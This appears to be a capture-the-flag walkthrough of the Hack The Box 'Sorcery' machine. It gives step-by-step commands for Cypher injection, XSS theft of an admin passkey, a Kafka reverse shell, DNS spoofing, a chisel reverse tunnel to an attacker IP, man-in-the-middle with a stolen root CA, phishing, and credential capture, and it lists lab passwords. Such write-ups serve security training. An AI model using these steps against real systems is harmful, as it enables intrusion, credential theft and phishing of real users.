Hack The Box - Season 8 - HTB Sorcery - Insane Walkthrough

lIlIlIlIIIIlllIllI

Step 1: Recon / Enumeration

• Run nmap:

  nmap -T4 -vv -sC -sV -oN nmap/intial 10.129.161.83
  

• Discovered open ports:

  • 22/tcp -> SSH (OpenSSH 9.6p1)
  • 443/tcp -> HTTPS (nginx/1.27.1)

Step 2: Web Enumeration

• Access main website:

  https://sorcery.htb/auth/login
  

• Discover Git server:

  https://git.sorcery.htb
  

• Clone repository:

  GIT_SSL_NO_VERIFY=true git clone https://git.sorcery.htb/nicole_sullivan/infrastructure.git
  

Step 3: Register User

• Register at:

  https://sorcery.htb/auth/register
  

Step 4: Cypher Injection for Registration Key

• Inject Cypher query to extract registration key:

  https://sorcery.htb/dashboard/store/88b6b6c5...%2F%2F
  

• Found registration key:

  dd05d743-b560-45dc-9a09-43ab18c7a513
  

• Register as seller using this key

Step 5: XSS to Extract Admin Passkey

• Access:

  https://sorcery.htb/dashboard/new-product
  

• Trigger XSS to extract admin credentials

Step 6: Cypher Injection to Reset Admin Password

• Inject payload:

  https://sorcery.htb/dashboard/store/...%2F%2F
  

• Admin password set to:

  haxforums
  

Step 7: Login with Passkey

• Use WebDevAuthn extension
• Login using Passkey: admin

Step 8: Kafka Exploitation

• Setup Kafka via docker-compose

• Extract topic from main.rs: update

• Send reverse shell payload via Kafka:

  python3 exploit_kafka.py
  

• Monitor traffic in Wireshark (Loopback)

Step 9: DNS Spoofing

• Modify /dns/hosts-user

  echo '10.10.15.11 pain.sorcery.htb' >> /dns/hosts-user
  ./convert.sh
  pkill -9 dnsmasq
  

Step 10: Chisel Tunnel for Proxy

• Serve chisel binary:

  python3 -m http.server 80
  

• Start client:

  ./chisel client 10.10.15.11:5555 R:socks
  

• Start server:

  ./chisel_arm server --port 5555 --reverse --socks5
  

Step 11: Download RootCA and Sign Certificate

• Use proxychains to download RootCA:

  curl ftp://172.19.0.2/pub/RootCA.key
  curl ftp://172.19.0.2/pub/RootCA.crt
  

• Sign cert and start mitmproxy:

  mitmproxy --mode reverse:https://git.sorcery.htb ...
  

Step 12: Phishing via Mail

• Send phishing mail to tom_summers

  swaks --to [email protected] --data "..."
  

• Retrieve credentials:

  tom_summers : jNsMKQ6k2.XDMPu.
  

Step 13: Extract Screenshot & OCR

• Get screen dump:

  wget http://10.10.11.71:2004/Xvfb_screen0
  mv Xvfb_screen0 text.xwd
  convert text.xwd text.png
  tesseract text.png output
  cat output.txt
  

• Found creds:

  tom_summers_admin : dWpuk7cesBjT-
  

Step 14: Privilege Escalation with Strace

• Run trace.sh to monitor docker login

• Trigger docker login:

  sudo -u rebecca_smith /usr/bin/docker login
  

• Extracted creds:

  rebecca_smith : -7eAZDp9-f9mg
  

Step 15: Use Proxy to Extract Docker Blob

• Use proxychains:

  curl -u 'rebecca_smith:...' http://127.0.0.1:5000/...
  

• Found creds:

  donna_adams : 3FEVPCT_c3xDH
  ash_winter : w@LoiU8Crmdep
  

Step 16: Root Privileges

• SSH into ash_winter

• Add to sudoers via ipa commands:

  ipa group-add-member sysadmins --users=ash_winter
  ipa sudorule-add-user allow_sudo --users=ash_winter
  sudo /usr/bin/systemctl restart sssd
  

• Become root:

  sudo su
  cat /root/root.txt